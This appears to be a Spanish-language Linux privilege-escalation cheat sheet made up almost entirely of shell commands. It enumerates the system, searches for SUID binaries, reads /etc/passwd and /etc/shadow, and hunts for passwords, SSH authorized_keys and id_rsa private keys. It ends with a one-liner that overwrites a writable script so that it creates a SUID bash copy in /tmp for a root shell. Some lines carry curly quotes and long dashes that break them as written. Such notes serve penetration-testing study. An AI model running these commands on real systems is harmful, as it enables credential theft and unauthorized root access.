hostname
hostname -I
uname -a
cat /proc/version
cat /etc/shells
lscpu
ps aux
env
find \-writable 2>/dev/null | grep "etc"
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
whoami
id
cat /etc/passwd
cat /etc/passwd | grep "sh$"
cat /etc/passwd | grep "sh$" | awk '{print $1}' FS=":"
cat /etc/shadow
sudo -l
history
ip a
ifconfig
route
ip route
arp -a
ip neigh
netstat -net
netstat -ano
grep –color=auto -rnw ‘/’ -ie “PASSWORD” –color=always 2>/dev/null
find . -type f -exec grep -i -I “PASSWORD” {} /dev/null
find / -name password 2>/dev/null \;
locate password | more
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null
Explotación con one-liners
#Con permiso de escritura sobre script en bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash'> /home/user/overwrite.sh
Enumeración con herramientas automatizadas
